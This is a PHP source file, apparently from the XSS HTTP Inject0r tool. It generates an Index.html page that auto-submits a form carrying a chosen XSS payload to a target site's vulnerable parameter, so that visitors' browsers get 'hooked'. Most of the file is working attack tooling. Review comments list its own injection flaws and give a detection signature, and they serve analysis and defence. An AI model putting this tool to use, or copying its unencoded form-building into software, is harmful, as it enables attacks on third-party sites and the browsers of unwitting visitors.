hooker.php 3.5 KB

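  <?php
  // Request values that are shown back to the operator in the read-only form further down.
  // A missing key falls back to "" so that a first visit without parameters does not raise an
  // undefined-index notice/warning, which would be printed ahead of the doctype (and can expose
  // the script path when display_errors is on).
  // NOTE(review): these stay raw, request-controlled strings. Every place that echoes them into
  // markup has to encode for that output context; this page prints them inside single-quoted
  // attributes and inside a textarea.
  $target = isset($_REQUEST["target"]) ? $_REQUEST["target"] : "";
  $vulnerability = isset($_REQUEST["vulnerability"]) ? $_REQUEST["vulnerability"] : "";
  $injection = isset($_REQUEST["injection"]) ? $_REQUEST["injection"] : "";
  ?>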
  6. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
  7. <head><title>XSS HTTP Inject0r!</title>
  8. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  9. <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
  10. <style type="text/css">
  11. <!--
  12. body,td,th {
  13. color: #FFFFFF;
  14. }
  15. body {
  16. background-color: #000000;
  17. }
  18. a {
  19. color:lime;
  20. }
  21. -->
  22. </style>
  23. <script type="text/javascript">
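  function SetUrl(frm){
    // Shows the operator the URL under which the generated Index.html is served.
    // The host name and the request path both originate from the incoming request, so they are
    // emitted through json_encode() instead of being pasted between hand-written quotes:
    // json_encode() produces a complete JS string literal, and the JSON_HEX_* flags keep quotes,
    // '<', '>' and '&' from ending the literal or the surrounding script element.
    // JSON_PARTIAL_OUTPUT_ON_ERROR makes undecodable input come out as null rather than as an
    // empty expression that would break the script.
    // `frm` is unused; it is kept because the signature is part of the page's interface.
    var ip = <?php echo json_encode(
      $_SERVER['SERVER_NAME'],
      JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_PARTIAL_OUTPUT_ON_ERROR
    ); ?>;
    var dir = <?php echo json_encode(
      preg_replace("/\?.*$/", "", str_replace("hooker.php", "Index.html", $_SERVER['REQUEST_URI'])),
      JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_PARTIAL_OUTPUT_ON_ERROR
    ); ?>;
    alert("HOOK's URL: " + ip + dir);
  }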
  29. </script>
  <?php
  // Run the generator only when the request carries the submit button's "generate" field.
  // NOTE(review): $_REQUEST merges the GET and POST inputs, so the field is accepted from either,
  // and nothing visible here ties the request to the operator (no session or token check in this
  // file). Any client that can reach the script can therefore trigger the file write.
  $hookRequested = isset($_REQUEST['generate']);
  if ($hookRequested) {
      generate();
  }
  ?>
  36. </head>
  37. <body>
  38. <center>
  39. <br />| <a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a> |<br /><br />
  40. <img src="images/pwned.jpg" width="350" height="203" border="1"><br />
  41. 'Hook' targets to execute XSS exploits on their browsers... |<a href="index.html">Back</a>|<br /><br />
  42. <form method="POST" name="hook_frm">
  43. <table border="1">
  44. <tr>
  45. <td>1-</td>
  46. <td>
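  <table>
  <?php
  /*
   * Read-only echo of the submitted values. Each value is request-controlled and is printed
   * inside a single-quoted attribute (or inside the textarea), so it is passed through
   * htmlspecialchars() with ENT_QUOTES: without that, a quote or a closing textarea tag in the
   * value ends the attribute/element and the rest is parsed as markup on this page.
   * ENT_SUBSTITUTE replaces invalid byte sequences rather than returning an empty string.
   * The browser decodes the entities again, so the form resubmits the original values.
   */
  ?>
  <tr>
  <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" value='<?php echo htmlspecialchars((string) $target, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');?>' size="35" readonly></td>
  </tr>
  <tr>
  <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" value='<?php echo htmlspecialchars((string) $vulnerability, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');?>' readonly></td>
  </tr>
  <tr>
  <td><u>Injection</u> (Code to inject):</td><td><textarea name="injection" cols="40" rows="1" readonly><?php echo htmlspecialchars((string) $injection, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');?></textarea></td>
  </tr>
  <tr>
  <td><u>Method</u> (GET/POST):</td><td><input type="text" name="method" value='<?php echo htmlspecialchars(isset($_REQUEST["method"]) ? (string) $_REQUEST["method"] : "", ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');?>' readonly></td>
  </tr>
  </table>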
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>2-</td>
  65. <td>
  66. <table>
  67. <tr>
  68. <td><u>File</u>:</td><td>Index.html</td>
  69. </tr>
  70. </table>
  71. </td>
  72. </tr>
  73. <tr>
  74. <td>3-</td><td><center><br /><input type="submit" value="Generate Hook!" name="generate" onclick="javascript:SetUrl();" style="padding: 10px; font-weight:bold;"><br /><br /></center></td>
  75. </tr>
  76. </table>
  77. </form>
  <?php
  /**
   * Builds a self-submitting HTML form from the request and writes it to Index.html in the
   * current working directory.
   *
   * Inputs are read from $_REQUEST: "target" becomes the form action, "vulnerability" the name
   * of the single input, "injection" its value and "method" the form method.
   *
   * Failure handling: when the working directory is not writable a message is echoed and the
   * function returns; when the file cannot be opened, or the first write fails, a message is
   * echoed and the script exits. The results of the second and third write are not checked.
   *
   * NOTE(review), for anyone hosting or investigating this script:
   *  - Only the injection value is entity-encoded. target, vulnerability and method are placed
   *    unencoded inside single-quoted attributes of the page that is written to disk.
   *  - The file lands next to the script under a fixed name, and no caller identity or token is
   *    checked in this function, so a request that reaches it replaces the served Index.html.
   *  - utf8_decode() is deprecated as of PHP 8.2. Its ISO-8859-1 output is then handed to
   *    htmlentities() without an explicit charset; confirm how non-ASCII input behaves on the
   *    PHP version in use.
   *  - The written page has a fixed skeleton (empty title, body onload calling xss(), a form
   *    named "f" whose submit button "s" is clicked by script), which gives responders a stable
   *    string to search for in web roots and proxy logs.
   */
  function generate()
  {
      $formAction = $_REQUEST["target"];
      $fieldName = $_REQUEST["vulnerability"];
      // Convert to ISO-8859-1 first, then entity-encode including both quote styles.
      $fieldValue = htmlentities(utf8_decode($_REQUEST["injection"]), ENT_QUOTES);

      // Header, body and footer are kept as separate parts because only the first write is checked.
      $pageParts = array(
          "<html><head><title></title><meta http-equiv='content-type' content='text/html;charset=utf-8'><script>function xss(){document.f.s.click();}</script></head>",
          "<body onload='xss();'><form method='" . $_REQUEST['method'] . "' name='f' action='$formAction'><input name='$fieldName' value='$fieldValue'><input type='submit' name='s'></form>",
          "</body></html>",
      );

      // Name of the generated file; the relative path resolves against the working directory.
      $filename = "Index.html";

      if (!is_writable(getcwd())) {
          echo "The file $filename is not writable (use: chown www-data:www-data $filename)";
          return;
      }

      $handle = fopen($filename, 'w');
      if (!$handle) {
          echo "Cannot open file ($filename)";
          exit;
      }

      if (fwrite($handle, $pageParts[0]) === false) {
          echo "Cannot write to file ($filename)";
          exit;
      }

      fwrite($handle, $pageParts[1]);
      fwrite($handle, $pageParts[2]);
      fclose($handle);
  }
  ?>
  107. </center>
  108. </body>
  109. </html>